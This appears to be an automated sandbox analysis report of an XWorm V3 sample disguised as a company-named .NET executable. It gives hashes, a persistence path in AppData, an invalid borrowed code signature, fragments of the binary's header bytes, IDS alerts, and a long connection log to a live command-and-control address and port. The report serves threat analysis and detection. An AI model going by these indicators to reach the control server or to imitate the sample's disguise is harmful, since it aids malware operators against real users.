                              Preview:L..................F.... .....2.w+..-..w+..-..w+............................:..DG..Yr?.D..U..k0.&...&...... M......U..w+..bX.w+......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl_Y.K....B.....................Bdg.A.p.p.D.a.t.a...B.V.1....._Y.K..Roaming.@......DWSl_Y.K....C.........................R.o.a.m.i.n.g.......2....._Y.K .SSBOTT~1.EXE..v......_Y.K_Y.K........................... Z.S.S. .B.o.t.t.m.a.c. .E.n.g.i.n.e.e.r.s. .P.v.t... .L.t.d.....e.x.e.......q...............-.......p............r.......C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe..1.....\.....\.....\.....\.....\.S.S. .B.o.t.t.m.a.c. .E.n.g.i.n.e.e.r.s. .P.v.t... .L.t.d.....e.x.e.`.......X.......767668...........hT..CrF.f4... ..?9.j....,...W..hT..CrF.f4... ..?9.j....,...W..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                              Process:C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):575496
                              Entropy (8bit):7.461418801045634
                              Encrypted:false
                              SSDEEP:12288:FDxrXQ9TZweejcQ1FXQEcupRk6CvPlZ0wJOszYkR:ZQejd1BpcupC6Cb0qL
                              MD5:FF9E45D7326698F34526793BF1244811
                              SHA1:B3FF69ABFE1C5E6633A866FFBEBE2139A69E3F0A
                              SHA-256:4DB566FCDC413FE50153DC8431AE86192241F0E1E86071F80D42EB6E0FB5BACA
                              SHA-512:ED2E02262BEB00F77C5D17854C7B6544CDB4EDCE37E870505E21C0CD08999CB99904A667E5ED31CDE3A3437C4E9713E6BFC63F091B30A9CEC25A046AD0120657
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 39%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....#g..............0.............F.... ........@.. ....................................@....................................O........................6..........pp..T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................%.......H.......P...(.......Y...x\...............................................0..L.........}.....( ......(!.....(............s".....(#....o$.....(%....o&.....('....*.0............}........((........().....,5...(............s".....(.....o$.....(.....o&....85....r...p.o...(*...o+...to.......(,..........9.....s ........s-...s....o/......o#...r...po0..........,$..(#.....o#...r...po0...s....o1........o2...(3.......o4...(5.......o6...(7.......o8...(9.......o:...(;.......o<...(=.........
                              Process:C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):26
                              Entropy (8bit):3.95006375643621
                              Encrypted:false
                              SSDEEP:3:ggPYV:rPYV
                              MD5:187F488E27DB4AF347237FE461A079AD
                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                              Malicious:true
                              Preview:[ZoneTransfer]....ZoneId=0
                              Process:C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):575496
                              Entropy (8bit):7.461418801045634
                              Encrypted:false
                              SSDEEP:12288:FDxrXQ9TZweejcQ1FXQEcupRk6CvPlZ0wJOszYkR:ZQejd1BpcupC6Cb0qL
                              MD5:FF9E45D7326698F34526793BF1244811
                              SHA1:B3FF69ABFE1C5E6633A866FFBEBE2139A69E3F0A
                              SHA-256:4DB566FCDC413FE50153DC8431AE86192241F0E1E86071F80D42EB6E0FB5BACA
                              SHA-512:ED2E02262BEB00F77C5D17854C7B6544CDB4EDCE37E870505E21C0CD08999CB99904A667E5ED31CDE3A3437C4E9713E6BFC63F091B30A9CEC25A046AD0120657
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 39%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....#g..............0.............F.... ........@.. ....................................@....................................O........................6..........pp..T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................%.......H.......P...(.......Y...x\...............................................0..L.........}.....( ......(!.....(............s".....(#....o$.....(%....o&.....('....*.0............}........((........().....,5...(............s".....(.....o$.....(.....o&....85....r...p.o...(*...o+...to.......(,..........9.....s ........s-...s....o/......o#...r...po0..........,$..(#.....o#...r...po0...s....o1........o2...(3.......o4...(5.......o6...(7.......o8...(9.......o:...(;.......o<...(=.........
                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Entropy (8bit):7.461418801045634
                              TrID:
                              • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                              • Win32 Executable (generic) a (10002005/4) 49.97%
                              • Generic Win/DOS Executable (2004/3) 0.01%
                              • DOS Executable Generic (2002/1) 0.01%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:SS Bottmac Engineers Pvt. Ltd..exe
                              File size:575'496 bytes
                              MD5:ff9e45d7326698f34526793bf1244811
                              SHA1:b3ff69abfe1c5e6633a866ffbebe2139a69e3f0a
                              SHA256:4db566fcdc413fe50153dc8431ae86192241f0e1e86071f80d42eb6e0fb5baca
                              SHA512:ed2e02262beb00f77c5d17854c7b6544cdb4edce37e870505e21c0cd08999cb99904a667e5ed31cde3a3437c4e9713e6bfc63f091b30a9cec25a046ad0120657
                              SSDEEP:12288:FDxrXQ9TZweejcQ1FXQEcupRk6CvPlZ0wJOszYkR:ZQejd1BpcupC6Cb0qL
                              TLSH:2DC48BD03A7A7719DEB58AB49129DDB583F12968B010FAE61DDD3BC7359D300AE08F06
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....#g..............0.............F.... ........@.. ....................................@................................
                              Icon Hash:00928e8e8686b000
                              Entrypoint:0x48a446
                              Entrypoint Section:.text
                              Digitally signed:true
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Time Stamp:0x67231B06 [Thu Oct 31 05:52:06 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                              Signature Valid:false
                              Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                              Signature Validation Error:The digital signature of the object did not verify
                              Error Number:-2146869232
                              Not Before:13/11/2018 01:00:00
                              Not After:09/11/2021 00:59:59
                              Subject Chain
                              • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                              Version:3
                              Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                              Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                              Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                              Serial:7C1118CBBADC95DA3752C46E47A27438
                              Instruction
                              jmp dword ptr [00402000h]
                              push ebx
                              add byte ptr [ecx+00h], bh
                              jnc 00007FA48D38A6C2h
                              je 00007FA48D38A6C2h
                              add byte ptr [ebp+00h], ch
                              add byte ptr [ecx+00h], al
                              arpl word ptr [eax], ax
                              je 00007FA48D38A6C2h
                              imul eax, dword ptr [eax], 00610076h
                              je 00007FA48D38A6C2h
                              outsd
                              add byte ptr [edx+00h], dh
                              add dword ptr [eax], eax
                              add byte ptr [eax], al
                              add al, byte ptr [eax]
                              add byte ptr [eax], al
                              add eax, dword ptr [eax]
                              add byte ptr [eax], al
                              add al, 00h
                              add byte ptr [eax], al
                              add eax, 00000000h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              Name                                  Virtual Address  Virtual Size  Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT          0x8a3f1          0x4f          .text
                              IMAGE_DIRECTORY_ENTRY_RESOURCE        0x8c000          0x694         .rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY        0x89200          0x3608
                              IMAGE_DIRECTORY_ENTRY_BASERELOC       0x8e000          0xc           .reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG           0x87070          0x54          .text
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                              IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                              Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
                              .text   0x2000           0x88484       0x88600   d35674f536bbe136f3752f27b7e9f34d  False     0.7844186812557287  data       7.459719521334949    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rsrc   0x8c000          0x694         0x800     46f1e6b661619d9b18067bec3234c547  False     0.3662109375        data       3.630613286820944    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc  0x8e000          0xc           0x200     883f6d6b8a419b887e602819eb31c4c5  False     0.044921875         data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                              Name         RVA      Size   Type                                                                               Language  Country  ZLIB Complexity
                              RT_VERSION   0x8c090  0x404  data                                                                                                   0.4270428015564202
                              RT_MANIFEST  0x8c4a4  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                      0.5489795918367347
                              DLL          Import
                              mscoree.dll  _CorExeMain
                              Timestamp                        SID      Signature                                                 Severity  Source IP    Source Port  Dest IP        Dest Port  Protocol
                              2024-10-31T10:32:39.990747+0100  2855924  ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound  1         192.168.2.5  50014        104.223.35.76  4068       TCP
                              2024-10-31T10:34:03.831754+0100  2853193  ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound  1         192.168.2.5  50035        104.223.35.76  4068       TCP
                              Timestamp                            Source Port  Dest Port  Source IP      Dest IP
                              Oct 31, 2024 10:31:30.302781105 CET  49764        4068       192.168.2.5    104.223.35.76
                              Oct 31, 2024 10:31:30.307766914 CET  4068         49764      104.223.35.76  192.168.2.5
                              Oct 31, 2024 10:31:30.307876110 CET  49764        4068       192.168.2.5    104.223.35.76
                              Oct 31, 2024 10:31:30.423974991 CET  49764        4068       192.168.2.5    104.223.35.76
                              Oct 31, 2024 10:31:30.428909063 CET  4068         49764      104.223.35.76  192.168.2.5
                              Oct 31, 2024 10:31:30.912976027 CET  4068         49764      104.223.35.76  192.168.2.5
                              Oct 31, 2024 10:31:30.913130045 CET  49764        4068       192.168.2.5    104.223.35.76
                              Oct 31, 2024 10:31:34.362528086 CET  49764        4068       192.168.2.5    104.223.35.76
                              Oct 31, 2024 10:31:34.364705086 CET  49789        4068       192.168.2.5    104.223.35.76
                              Oct 31, 2024 10:31:34.367291927 CET  4068         49764      104.223.35.76  192.168.2.5
                              Oct 31, 2024 10:31:34.369560003 CET  4068         49789      104.223.35.76  192.168.2.5
                              Oct 31, 2024 10:31:34.369709015 CET  49789        4068       192.168.2.5    104.223.35.76
                              Oct 31, 2024 10:31:34.843142033 CET  49789        4068       192.168.2.5    104.223.35.76
                              Oct 31, 2024 10:31:34.848114014 CET  4068         49789      104.223.35.76  192.168.2.5
                              Oct 31, 2024 10:31:34.958785057 CET  4068         49789      104.223.35.76  192.168.2.5
                              Oct 31, 2024 10:31:34.958868980 CET  49789        4068       192.168.2.5    104.223.35.76
                              Oct 31, 2024 10:31:38.003479958 CET  49789        4068       192.168.2.5    104.223.35.76
                              Oct 31, 2024 10:31:38.004472971 CET  49809        4068       192.168.2.5    104.223.35.76
                              Oct 31, 2024 10:31:38.008424997 CET  4068         49789      104.223.35.76  192.168.2.5
                              Oct 31, 2024 10:31:38.009432077 CET  4068         49809      104.223.35.76  192.168.2.5
                              Oct 31, 2024 10:31:38.009515047 CET  49809        4068       192.168.2.5    104.223.35.76
                              Oct 31, 2024 10:31:38.019609928 CET  49809        4068       192.168.2.5    104.223.35.76
                              Oct 31, 2024 10:31:38.025077105 CET  4068         49809      104.223.35.76  192.168.2.5
                              Oct 31, 2024 10:31:38.592128992 CET  4068         49809      104.223.35.76  192.168.2.5
                              Oct 31, 2024 10:31:38.592247009 CET  49809        4068       192.168.2.5    104.223.35.76
                              Oct 31, 2024 10:31:41.927381039 CET  49809        4068       192.168.2.5    104.223.35.76
                              Oct 31, 2024 10:31:41.929008007 CET  49831        4068       192.168.2.5    104.223.35.76
                              Oct 31, 2024 10:31:41.932228088 CET  4068         49809      104.223.35.76  192.168.2.5
                              Oct 31, 2024 10:31:41.933902979 CET  4068         49831      104.223.35.76  192.168.2.5
                              Oct 31, 2024 10:31:41.934004068 CET  49831        4068       192.168.2.5    104.223.35.76
                              Oct 31, 2024 10:31:41.945107937 CET  49831        4068       192.168.2.5    104.223.35.76
                              Oct 31, 2024 10:31:41.949979067 CET  4068         49831      104.223.35.76  192.168.2.5
                              Oct 31, 2024 10:31:42.528084040 CET  4068         49831      104.223.35.76  192.168.2.5
                              Oct 31, 2024 10:31:42.529757023 CET  49831        4068       192.168.2.5    104.223.35.76
                              Oct 31, 2024 10:31:45.582067013 CET  49831        4068       192.168.2.5    104.223.35.76
                              Oct 31, 2024 10:31:45.583619118 CET  49848        4068       192.168.2.5    104.223.35.76
                              Oct 31, 2024 10:31:45.586910963 CET  4068         49831      104.223.35.76  192.168.2.5
                              Oct 31, 2024 10:31:45.588481903 CET  4068         49848      104.223.35.76  192.168.2.5
                              Oct 31, 2024 10:31:45.589274883 CET  49848        4068       192.168.2.5    104.223.35.76
                              Oct 31, 2024 10:31:45.695251942 CET  49848        4068       192.168.2.5    104.223.35.76
                              Oct 31, 2024 10:31:45.700078011 CET  4068         49848      104.223.35.76  192.168.2.5
                              Oct 31, 2024 10:31:46.175339937 CET  4068         49848      104.223.35.76  192.168.2.5
                              Oct 31, 2024 10:31:46.175535917 CET  49848        4068       192.168.2.5    104.223.35.76
                              Oct 31, 2024 10:31:49.206543922 CET  49848        4068       192.168.2.5    104.223.35.76
                              Oct 31, 2024 10:31:49.208218098 CET  49870        4068       192.168.2.5    104.223.35.76
                              Oct 31, 2024 10:31:49.211394072 CET  4068         49848      104.223.35.76  192.168.2.5
                              Oct 31, 2024 10:31:49.213062048 CET  4068         49870      104.223.35.76  192.168.2.5
                              Oct 31, 2024 10:31:49.213185072 CET  49870        4068       192.168.2.5    104.223.35.76
                              Oct 31, 2024 10:31:49.229417086 CET  49870        4068       192.168.2.5    104.223.35.76
                              Oct 31, 2024 10:31:49.234226942 CET  4068         49870      104.223.35.76  192.168.2.5
                              Oct 31, 2024 10:31:49.804361105 CET  4068         49870      104.223.35.76  192.168.2.5
                              Oct 31, 2024 10:31:49.804476976 CET  49870        4068       192.168.2.5    104.223.35.76
                              Oct 31, 2024 10:31:54.112865925 CET  49870        4068       192.168.2.5    104.223.35.76
                              Oct 31, 2024 10:31:54.114085913 CET  49896        4068       192.168.2.5    104.223.35.76
                              Oct 31, 2024 10:31:54.118088961 CET  4068         49870      104.223.35.76  192.168.2.5
                              Oct 31, 2024 10:31:54.119124889 CET  4068         49896      104.223.35.76  192.168.2.5
                              Oct 31, 2024 10:31:54.119244099 CET  49896        4068       192.168.2.5    104.223.35.76
                              Oct 31, 2024 10:31:54.138186932 CET  49896        4068       192.168.2.5    104.223.35.76
                              Oct 31, 2024 10:31:54.143094063 CET  4068         49896      104.223.35.76  192.168.2.5
                              Oct 31, 2024 10:31:54.708005905 CET  4068         49896      104.223.35.76  192.168.2.5
                              Oct 31, 2024 10:31:54.708093882 CET  49896        4068       192.168.2.5    104.223.35.76
                              Oct 31, 2024 10:31:54.722228050 CET  49896        4068       192.168.2.5    104.223.35.76
                              Oct 31, 2024 10:31:54.723329067 CET  49902        4068       192.168.2.5    104.223.35.76
                              Oct 31, 2024 10:31:54.727175951 CET  4068         49896      104.223.35.76  192.168.2.5
                              Oct 31, 2024 10:31:54.728257895 CET  4068         49902      104.223.35.76  192.168.2.5
                              Oct 31, 2024 10:31:54.728337049 CET  49902        4068       192.168.2.5    104.223.35.76
                              Oct 31, 2024 10:31:54.737328053 CET  49902        4068       192.168.2.5    104.223.35.76
                              Oct 31, 2024 10:31:54.742156982 CET  4068         49902      104.223.35.76  192.168.2.5
                              Oct 31, 2024 10:31:55.315321922 CET  4068         49902      104.223.35.76  192.168.2.5
                              Oct 31, 2024 10:31:55.316575050 CET  49902        4068       192.168.2.5    104.223.35.76
                              Oct 31, 2024 10:31:59.196410894 CET  49902        4068       192.168.2.5    104.223.35.76
                              Oct 31, 2024 10:31:59.201267958 CET  4068         49902      104.223.35.76  192.168.2.5
                              Oct 31, 2024 10:31:59.240833044 CET  49929        4068       192.168.2.5    104.223.35.76
                              Oct 31, 2024 10:31:59.245920897 CET  4068         49929      104.223.35.76  192.168.2.5
                              Oct 31, 2024 10:31:59.246006966 CET  49929        4068       192.168.2.5    104.223.35.76
                              Oct 31, 2024 10:31:59.351717949 CET  49929        4068       192.168.2.5    104.223.35.76
                              Oct 31, 2024 10:31:59.356585026 CET  4068         49929      104.223.35.76  192.168.2.5
                              Oct 31, 2024 10:31:59.831048012 CET  4068         49929      104.223.35.76  192.168.2.5
                              Oct 31, 2024 10:31:59.831181049 CET  49929        4068       192.168.2.5    104.223.35.76
                              Oct 31, 2024 10:32:03.503720999 CET  49929        4068       192.168.2.5    104.223.35.76
                              Oct 31, 2024 10:32:03.504893064 CET  49950        4068       192.168.2.5    104.223.35.76
                              Oct 31, 2024 10:32:03.815814972 CET  49929        4068       192.168.2.5    104.223.35.76
                              Oct 31, 2024 10:32:04.425259113 CET  49929        4068       192.168.2.5    104.223.35.76
                              Oct 31, 2024 10:32:04.518970966 CET  49950        4068       192.168.2.5    104.223.35.76
                              Oct 31, 2024 10:32:04.604948044 CET  4068         49929      104.223.35.76  192.168.2.5
                              Oct 31, 2024 10:32:04.604971886 CET406849950104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:04.605081081 CET406849929104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:04.605232954 CET499294068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:04.605233908 CET499504068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:04.606174946 CET406849929104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:04.606213093 CET499294068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:04.606381893 CET406849950104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:04.606417894 CET499504068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:04.876774073 CET499504068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:04.881680965 CET406849950104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:05.195539951 CET406849950104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:05.195648909 CET499504068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:08.659670115 CET499504068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:08.661576986 CET499714068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:08.667212963 CET406849950104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:08.667228937 CET406849971104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:08.667323112 CET499714068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:08.679802895 CET499714068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:08.684609890 CET406849971104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:09.429411888 CET406849971104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:09.429672956 CET499714068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:09.519119024 CET499714068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:09.520442009 CET499774068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:09.524116039 CET406849971104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:09.525511980 CET406849977104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:09.525599003 CET499774068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:09.536068916 CET499774068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:09.541054010 CET406849977104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:10.125515938 CET406849977104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:10.125618935 CET499774068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:13.050539970 CET499774068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:13.052598000 CET499954068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:13.055396080 CET406849977104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:13.057424068 CET406849995104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:13.057528973 CET499954068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:13.087949038 CET499954068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:13.093146086 CET406849995104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:13.639307976 CET406849995104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:13.639487028 CET499954068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:13.706521034 CET499954068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:13.710195065 CET499984068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:13.711414099 CET406849995104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:13.715068102 CET406849998104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:13.715150118 CET499984068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:13.740076065 CET499984068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:13.744914055 CET406849998104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:14.308464050 CET406849998104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:14.308532953 CET499984068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:16.128467083 CET499984068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:16.130481005 CET499994068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:16.133887053 CET406849998104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:16.135371923 CET406849999104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:16.135449886 CET499994068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:16.146354914 CET499994068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:16.152038097 CET406849999104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:16.736289978 CET406849999104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:16.737766027 CET499994068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:18.519062996 CET499994068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:18.520276070 CET500004068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:18.524059057 CET406849999104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:18.525181055 CET406850000104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:18.525275946 CET500004068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:18.535919905 CET500004068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:18.541012049 CET406850000104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:19.137346983 CET406850000104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:19.137522936 CET500004068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:20.315901995 CET500004068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:20.318155050 CET500014068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:20.320804119 CET406850000104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:20.323124886 CET406850001104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:20.323200941 CET500014068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:20.418299913 CET500014068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:20.423144102 CET406850001104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:20.924993038 CET406850001104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:20.925316095 CET500014068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:22.097300053 CET500014068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:22.098588943 CET500024068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:22.102139950 CET406850001104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:22.103471994 CET406850002104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:22.103553057 CET500024068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:22.113014936 CET500024068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:22.118046999 CET406850002104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:22.726711035 CET406850002104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:22.726849079 CET500024068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:23.894179106 CET500024068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:23.895448923 CET500034068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:23.899177074 CET406850002104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:23.901204109 CET406850003104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:23.901303053 CET500034068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:23.911215067 CET500034068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:23.917193890 CET406850003104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:24.500196934 CET406850003104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:24.500297070 CET500034068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:25.566111088 CET500034068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:25.567339897 CET500044068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:25.572357893 CET406850003104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:25.573443890 CET406850004104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:25.573545933 CET500044068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:25.583420992 CET500044068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:25.589354038 CET406850004104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:26.183011055 CET406850004104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:26.183150053 CET500044068192.168.2.5104.223.35.76
